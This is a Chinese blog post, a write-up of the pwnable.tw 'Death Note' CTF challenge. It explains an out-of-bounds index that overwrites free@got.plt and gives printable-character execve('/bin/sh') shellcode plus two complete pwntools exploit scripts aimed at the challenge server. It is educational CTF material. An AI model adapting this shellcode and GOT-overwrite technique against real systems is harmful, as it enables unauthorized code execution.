<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"qwen.io","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="【pwnable.tw】刷题记录：Death Note">
<meta property="og:type" content="article">
<meta property="og:title" content="pwnable.tw writeup-Death Note">
<meta property="og:url" content="http://qwen.io/post/Death-Note/index.html">
<meta property="og:site_name" content="Qwen&#39;s blog">
<meta property="og:description" content="【pwnable.tw】刷题记录：Death Note">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-07-27T14:34:43.000Z">
<meta property="article:modified_time" content="2025-10-16T13:41:39.292Z">
<meta property="article:author" content="Qwen">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="栈">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://qwen.io/post/Death-Note/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>pwnable.tw writeup-Death Note | Qwen's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Qwen's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
   <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://qwen.io/post/Death-Note/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar_2.jpg">
      <meta itemprop="name" content="Qwen">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Qwen's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          pwnable.tw writeup-Death Note
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-07-27 22:34:43" itemprop="dateCreated datePublished" datetime="2024-07-27T22:34:43+08:00">2024-07-27</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-10-16 21:41:39" itemprop="dateModified" datetime="2025-10-16T21:41:39+08:00">2025-10-16</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/" itemprop="url" rel="index"><span itemprop="name">pwn刷题记录</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/pwnable-tw%E5%88%B7%E9%A2%98/" itemprop="url" rel="index"><span itemprop="name">pwnable.tw刷题</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>3k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>3 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>【pwnable.tw】刷题记录：Death Note</p>
<span id="more"></span>

<h2 id="学习与收获"><a href="#学习与收获" class="headerlink" title="学习与收获"></a>学习与收获</h2><ol>
<li><p>认识了三个汇编指令，<br><code>dec</code>：将操作数的值减去<code>1</code>。如，<code>edx</code>的值原来为<code>0x30</code>，执行<code>dec edx</code>后，<code>edx</code>的值变为<code>0x2f</code>。<br><code>inc</code>：将操作数的值加上<code>1</code>。如，<code>eax</code>的值原来为<code>0</code>，执行<code>inc eax</code>后，<code>eax</code>的值变为<code>0x1</code>。</p>
<p><code>xor</code>：将两个操作数的值进行异或。异或，两个二进制数，对应位异或，同为<code>0</code>，不同为<code>1</code>。</p>
</li>
<li><p>对于<code>32</code>位的寄存器<code>edx</code>，<code>dl</code>是其低<code>8</code>位，即最后<code>1</code>个字节；<code>dh</code>是其高<code>8</code>位，即第<code>1</code>个字节。</p>
</li>
<li><p>对于<code>syscall</code>和<code>int 0x80</code>的不可见字符汇编代码编写，<br><code>syscall</code>的机器码是<code>\x0f\x05</code>，<code>int 0x80</code>的机器码是<code>\xCD\x80</code>。这两个指令都是汇编指令，故其在内存中的存储形式是机器码。也就是说，如果<code>0x08048020</code>这个地址里，存储的数据是<code>0x80cd</code>，便可以理解为地址<code>0x08048020</code>存储着<code>int 0x80</code>这个指令。</p>
</li>
</ol>
<h2 id="整体思路"><a href="#整体思路" class="headerlink" title="整体思路"></a>整体思路</h2><p>程序没有开<em>pie</em>保护，可能要用到<em>shellcode</em>。程序主要功能是实现<em>chunk</em>的创建，打印，删除。在创建<em>chunk</em>的时候，有一个索引越界漏洞，我们可以通过输入负数，覆盖<em>note</em>数组前面的内容为<em>chunk_hook</em>。</p>
<p>通过以上方法，覆盖<code>free@got.plt</code>，为一个<em>chunk_hook</em>，该<em>chunk_hook</em>指向<em>chunk</em>的<em>user_data</em>。如果我们把<em>shellcode</em>布置在<em>chunk</em>中，那么在删除<em>chunk</em>的时候，便会执行<em>shellcode</em>。</p>
<p>该题考察了关于可见字符<em>shellcode</em>的编写，不能使用<em>mov</em>，<em>syscall</em>，<em>int 0x80</em>等，我便学习用<em>push,pop,dec,inc,xor</em>来编写<code>32</code>位的<em>execve</em>的系统调用。</p>
<h4 id="dec"><a href="#dec" class="headerlink" title="dec"></a><em>dec</em></h4><blockquote>
<p>汇编指令<code>dec</code>是”decrement”的缩写，意思是将操作数的值减去1。在汇编语言中，<code>dec</code>指令通常用于减少寄存器或内存位置中的数值。例如，如果有一个寄存器A的当前值为5，执行<code>dec A</code>后，寄存器A的值将变为4。</p>
<p><code>dec</code>指令可以应用于不同的上下文和数据类型，具体行为可能因使用的CPU架构和汇编语言的变种而有所不同。在一些架构中，<code>dec</code>可能只影响无符号整数，而在其他架构中，它可能适用于有符号整数。使用时需要参考特定处理器的指令集架构（ISA）文档。</p>
</blockquote>
<h4 id="inc"><a href="#inc" class="headerlink" title="inc"></a><em>inc</em></h4><blockquote>
<p>汇编指令<code>inc</code>是”increment”的缩写，意思是将操作数的值增加1。这个指令通常用于寄存器或内存位置中的数值增加操作。</p>
<p>例如，如果有一个寄存器B的当前值为3，执行<code>inc B</code>后，寄存器B的值将变为4。</p>
<p>与<code>dec</code>指令类似，<code>inc</code>的具体行为可能因使用的CPU架构和汇编语言的变种而有所不同。在某些架构中，<code>inc</code>可能只影响无符号整数，而在其他架构中，它可能适用于有符号整数。使用时同样需要参考特定处理器的指令集架构（ISA）文档。</p>
</blockquote>
<h4 id="shellcode"><a href="#shellcode" class="headerlink" title="shellcode"></a><em>shellcode</em></h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">#execve(&quot;/bin/sh&quot;,0,0) eax = 11</span><br><span class="line">#ebx,ecx,edx</span><br><span class="line">/*   将&#x27;/bin//sh&#x27;的地址放到ebx中</span><br><span class="line">push ebx</span><br><span class="line">push 0x68732f2f</span><br><span class="line">push 0x6e69622f</span><br><span class="line">push esp</span><br><span class="line">pop ebx</span><br><span class="line">push edx</span><br><span class="line">*/</span><br><span class="line">dec edx   #edx-1</span><br><span class="line">dec edx</span><br><span class="line">xor [eax+36], dl</span><br><span class="line">xor [eax+37], dl</span><br><span class="line">pop edx</span><br><span class="line">/*   eax = 11</span><br><span class="line">push ecx</span><br><span class="line">pop eax</span><br><span class="line">inc eax</span><br><span class="line">inc eax</span><br><span class="line">inc eax</span><br><span class="line">inc eax	</span><br><span class="line">inc eax</span><br><span class="line">inc eax</span><br><span class="line">inc eax</span><br><span class="line">inc eax</span><br><span class="line">inc eax</span><br><span class="line">inc eax</span><br><span class="line">inc eax</span><br><span class="line">*/</span><br></pre></td></tr></table></figure>

<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a><em>exp</em></h2><h3 id="本地"><a href="#本地" class="headerlink" title="本地"></a>本地</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> tools <span class="keyword">import</span> *</span><br><span class="line"><span class="comment"># p = process(&#x27;./death_note&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&quot;chall.pwnable.tw&quot;</span>,<span class="number">10201</span>)</span><br><span class="line">debug(p,<span class="number">0x080489EF</span>,<span class="number">0x080489FD</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">index,content</span>):</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Your choice :&quot;</span>,<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Index :&quot;</span>,<span class="built_in">str</span>(index))</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Name :&quot;</span>,content)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">index</span>):</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Your choice :&quot;</span>,<span class="built_in">str</span>(<span class="number">3</span>))</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Index :&quot;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">	push ebx</span></span><br><span class="line"><span class="string">	push 0x68732f2f</span></span><br><span class="line"><span class="string">	push 0x6e69622f</span></span><br><span class="line"><span class="string">	push esp</span></span><br><span class="line"><span class="string">	pop ebx</span></span><br><span class="line"><span class="string">    dec ecx</span></span><br><span class="line"><span class="string">    dec edx</span></span><br><span class="line"><span class="string">    dec edx</span></span><br><span class="line"><span class="string">    dec edx</span></span><br><span class="line"><span class="string">    dec edx</span></span><br><span class="line"><span class="string">    dec edx</span></span><br><span class="line"><span class="string">    dec edx</span></span><br><span class="line"><span class="string">    dec edx</span></span><br><span class="line"><span class="string">    dec edx</span></span><br><span class="line"><span class="string">    dec edx</span></span><br><span class="line"><span class="string">    inc edx</span></span><br><span class="line"><span class="string">    dec edx</span></span><br><span class="line"><span class="string">    xor [eax+56],dl</span></span><br><span class="line"><span class="string">    xor [eax+57],dl</span></span><br><span class="line"><span class="string">	pop edi</span></span><br><span class="line"><span class="string">    pop edi</span></span><br><span class="line"><span class="string">	pop eax</span></span><br><span class="line"><span class="string">    inc edx</span></span><br><span class="line"><span class="string">    inc edx</span></span><br><span class="line"><span class="string">    inc edx</span></span><br><span class="line"><span class="string">    inc edx</span></span><br><span class="line"><span class="string">    inc edx</span></span><br><span class="line"><span class="string">    inc edx</span></span><br><span class="line"><span class="string">    inc edx</span></span><br><span class="line"><span class="string">    inc edx</span></span><br><span class="line"><span class="string">    inc edx</span></span><br><span class="line"><span class="string">    inc edx</span></span><br><span class="line"><span class="string">    dec edx</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	&#x27;&#x27;&#x27;</span></span><br><span class="line">shellcode = asm(shellcode) + <span class="string">b&#x27;\x3a\x77&#x27;</span></span><br><span class="line">add(-<span class="number">19</span>,shellcode)</span><br><span class="line">delete(-<span class="number">19</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="远程"><a href="#远程" class="headerlink" title="远程"></a>远程</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> tools <span class="keyword">import</span> *</span><br><span class="line"><span class="comment"># p = process(&#x27;./death_note&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&quot;chall.pwnable.tw&quot;</span>,<span class="number">10201</span>)</span><br><span class="line">debug(p,<span class="number">0x080489EF</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">index,content</span>):</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Your choice :&quot;</span>,<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Index :&quot;</span>,<span class="built_in">str</span>(index))</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Name :&quot;</span>,content)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">index</span>):</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Your choice :&quot;</span>,<span class="built_in">str</span>(<span class="number">3</span>))</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Index :&quot;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">	push ebx</span></span><br><span class="line"><span class="string">	push 0x68732f2f</span></span><br><span class="line"><span class="string">	push 0x6e69622f</span></span><br><span class="line"><span class="string">	push esp</span></span><br><span class="line"><span class="string">	pop ebx</span></span><br><span class="line"><span class="string">	push edx</span></span><br><span class="line"><span class="string">	dec edx</span></span><br><span class="line"><span class="string">	dec edx</span></span><br><span class="line"><span class="string">	xor [eax+36], dl</span></span><br><span class="line"><span class="string">	xor [eax+37], dl</span></span><br><span class="line"><span class="string">	pop edx</span></span><br><span class="line"><span class="string">	push ecx</span></span><br><span class="line"><span class="string">	pop eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	inc eax</span></span><br><span class="line"><span class="string">	&#x27;&#x27;&#x27;</span></span><br><span class="line">shellcode = asm(shellcode) + <span class="string">b&#x27;\x33\x7e&#x27;</span></span><br><span class="line">add(-<span class="number">19</span>,shellcode)</span><br><span class="line">delete(-<span class="number">19</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/%E6%A0%88/" rel="tag"># 栈</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/post/Starbound/" rel="prev" title="pwnable.tw writeup-Starbound">
      <i class="fa fa-chevron-left"></i> pwnable.tw writeup-Starbound
    </a></div>
      <div class="post-nav-item">
    <a href="/post/Spirited-Away/" rel="next" title="pwnable.tw writeup-Spirited Away">
      pwnable.tw writeup-Spirited Away <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
      <!-- require APlayer -->
      <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.css">
      <script src="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.js"></script>
      <!-- require MetingJS-->
      <script src="https://cdn.jsdelivr.net/npm/meting@2.0.1/dist/Meting.min.js"></script>
      <meting-js
        auto="https://y.qq.com/n/yqq/playlist/9454682797.html#stat=y_new.playlist.pic_click">
      </meting-js>

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AD%A6%E4%B9%A0%E4%B8%8E%E6%94%B6%E8%8E%B7"><span class="nav-number">1.</span> <span class="nav-text">学习与收获</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%95%B4%E4%BD%93%E6%80%9D%E8%B7%AF"><span class="nav-number">2.</span> <span class="nav-text">整体思路</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#dec"><span class="nav-number">2.0.1.</span> <span class="nav-text">dec</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#inc"><span class="nav-number">2.0.2.</span> <span class="nav-text">inc</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#shellcode"><span class="nav-number">2.0.3.</span> <span class="nav-text">shellcode</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp"><span class="nav-number">3.</span> <span class="nav-text">exp</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%AC%E5%9C%B0"><span class="nav-number">3.1.</span> <span class="nav-text">本地</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%9C%E7%A8%8B"><span class="nav-number">3.2.</span> <span class="nav-text">远程</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Qwen"
      src="/images/avatar_2.jpg">
  <p class="site-author-name" itemprop="name">Qwen</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">59</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Qwen11" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Qwen11" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:2144987805@qq.com" title="E-Mail → mailto:2144987805@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Qwen</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">280k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">4:14</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div>




    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
